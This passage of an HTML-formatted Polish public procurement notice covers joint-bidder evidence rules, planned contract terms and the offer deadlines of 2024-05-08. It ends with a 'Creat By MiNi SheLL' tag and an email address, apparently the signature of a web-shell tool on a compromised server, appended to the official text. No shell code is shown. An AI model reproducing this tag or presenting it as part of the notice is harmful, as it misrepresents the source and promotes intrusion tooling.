wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu opisanych w Rozdziale VI SWZ, warunki udziału w postępowaniu wskazane w rozdziale VII muszą spełniać łącznie.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o których mowa w rozdziale VIII SWZ przy czym:<br/>3.1.	podmiotowe środki dowodowe, dotyczące warunków udziału w postępowaniu składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w Rozdziale VIII SWZ.<br/>3.2.	podmiotowe środki dowodowe, dotyczące braku podstaw wykluczenia składa każdy z nich.<br/>4.	Zamawiający nie określił odmiennych wymagań związanych z realizacją zamówienia w odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy są możliwe na zasadach opisanych we wzorze umowy (załącznik 2 do SWZ) i w art. 455 ustawy PZP <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/up_krakow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com